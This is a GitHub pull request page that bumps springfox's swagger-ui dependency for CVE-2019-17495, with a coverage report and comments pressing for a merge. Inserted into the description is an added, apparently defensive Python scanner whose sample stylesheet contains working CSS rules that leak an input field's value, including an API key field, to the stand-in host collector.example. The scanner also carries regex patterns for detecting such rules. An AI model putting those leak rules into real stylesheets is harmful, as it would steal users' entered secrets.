Bump swagger-ui dependency #3135

Merged: 1 commit, Jan 6, 2020

Conversation

StevenLocke, Contributor

Security fix detailed in swagger-ui's release notes.
https://github.com/swagger-api/swagger-ui/releases/tag/v3.23.11

What's this PR do/fix?

Bumps the swagger-ui dependency.

Are there unit tests? If not how should this be manually tested?

No new functionality, just a gradle dependency version change. All of the old tests should be run to verify no breaking changes between versions.

Any background context you want to provide?

Swagger-ui has a security fix that addresses a CSS-based input field value exfiltration vulnerability in this release.

What are the relevant issues?

#3131
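The class of bug named in the description, a stylesheet whose selectors react to an input field's value and trigger a fetch keyed to that value, is something a defender can screen for in CI or at a proxy, and a Content-Security-Policy can close the fetch channel while a dependency bump like this one is still pending. The following is an added example and is not code from springfox or swagger-ui; the sample stylesheet and the host `collector.example` are constructed for illustration, and the CSP check is a heuristic over the `img-src`/`default-src` directives only.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Constructed sample stylesheet (not from swagger-ui or springfox): two
# benign rules, then two rules whose selector tests an input's value and
# whose declaration fetches a remote resource keyed to that value.
SAMPLE_CSS = """
/* benign styling */
input[type="text"] { border: 1px solid #ccc; }
.logo { background: url(/static/logo.png); }
/* suspicious: matches on the field's value and leaks it via a fetch */
input[name="apiKey"][value^="a"] { background-image: url("https://collector.example/leak?c=a"); }
input[value$="9"]{background:url(//collector.example/leak?c=9)}
"""

COMMENT = re.compile(r"/\*.*?\*/", re.S)
RULE = re.compile(r"([^{}]+)\{([^{}]*)\}", re.S)
# attribute selector on `value` with any match operator (=, ^=, $=, *=, ~=, |=)
VALUE_SELECTOR = re.compile(r"\[\s*value\s*[\^$*~|]?=", re.I)
URL_REF = re.compile(r"url\(\s*(['\"]?)([^'\")]+)\1\s*\)", re.I)


@dataclass
class Finding:
    selector: str
    url: str
    host: str


def _external_host(ref: str):
    """Return the host of an absolute or protocol-relative URL, else None."""
    ref = ref.strip()
    if ref.startswith("//"):
        ref = "https:" + ref
    parsed = urlparse(ref)
    if parsed.scheme in ("http", "https") and parsed.netloc:
        return parsed.netloc.lower()
    return None


def find_value_exfil_rules(css: str, allowed_hosts=()):
    """Flag rules that both match on an input's value and load a URL from a
    host outside `allowed_hosts`: the shape a CSS value-exfiltration rule has."""
    findings = []
    for match in RULE.finditer(COMMENT.sub("", css)):
        selector, body = match.group(1).strip(), match.group(2)
        if not VALUE_SELECTOR.search(selector):
            continue
        for ref in URL_REF.finditer(body):
            host = _external_host(ref.group(2))
            if host and host not in allowed_hosts:
                findings.append(Finding(selector, ref.group(2).strip(), host))
    return findings


def csp_restricts_image_fetches(csp: str) -> bool:
    """Heuristic: does this Content-Security-Policy confine where a
    background-image fetch may go?  That fetch is governed by img-src (falling
    back to default-src); url() in other properties falls under other
    directives, which this check does not inspect."""
    directives = {}
    for part in csp.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = [t.lower() for t in tokens[1:]]
    sources = directives.get("img-src", directives.get("default-src"))
    if not sources:
        return False  # no applicable directive: any host is allowed
    unrestricted = {"*", "http:", "https:"}
    return not any(src in unrestricted for src in sources)


if __name__ == "__main__":
    for f in find_value_exfil_rules(SAMPLE_CSS):
        print(f"exfil-shaped rule -> {f.host}: {f.selector}")
    print("CSP confines fetches:", csp_restricts_image_fetches("default-src 'self'"))
```

The scanner keys on the combination that makes such a rule dangerous (a `value` attribute selector together with a `url()` pointing off-host), so ordinary attribute-styled inputs and same-origin backgrounds are not flagged; the CSP check answers the narrower question of whether the leak's fetch would be allowed at all, which is the mitigation available to an operator who cannot yet ship the fixed dependency.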

@codecov

codecov bot commented Oct 8, 2019

Codecov Report

Merging #3135 into master will increase coverage by 0.02%.
The diff coverage is n/a.


@@             Coverage Diff              @@
##             master    #3135      +/-   ##
============================================
+ Coverage     92.91%   92.93%   +0.02%     
- Complexity     3512     3513       +1     
============================================
  Files           382      382              
  Lines          9330     9330              
  Branches        768      768              
============================================
+ Hits           8669     8671       +2     
+ Misses          472      471       -1     
+ Partials        189      188       -1
Impacted Files                                         Coverage Δ            Complexity Δ
...umentation/spring/web/scanners/ApiModelReader.java  95.46% <0%> (+0.56%)  88% <0%> (+1%) ⬆️

@margocrawf

@martypitt @dilipkrish @adrianbk, please take a look at this PR that is related to https://nvd.nist.gov/vuln/detail/CVE-2019-17495, a 9.8 critical vulnerability.

@kalaivani572

@martypitt @dilipkrish @adrianbk can you please take care of this PR? This issue is a 9.8 critical vulnerability now and is blocking us from using springfox.

@IAmJoffa

I'm also waiting on the merge for this CVE fix, as it's blocking our use of the component.

@clarkead

I'm also waiting on this to be merged as this library is getting flagged in my builds. @martypitt @dilipkrish @adrianbk any chance one of you could take a look at this PR?

@dilipkrish dilipkrish added the PR label Jan 6, 2020
@dilipkrish dilipkrish added this to the 3.0 milestone Jan 6, 2020
@dilipkrish, Member

Thanks @StevenLocke

@dilipkrish dilipkrish merged commit dd3282c into springfox:master Jan 6, 2020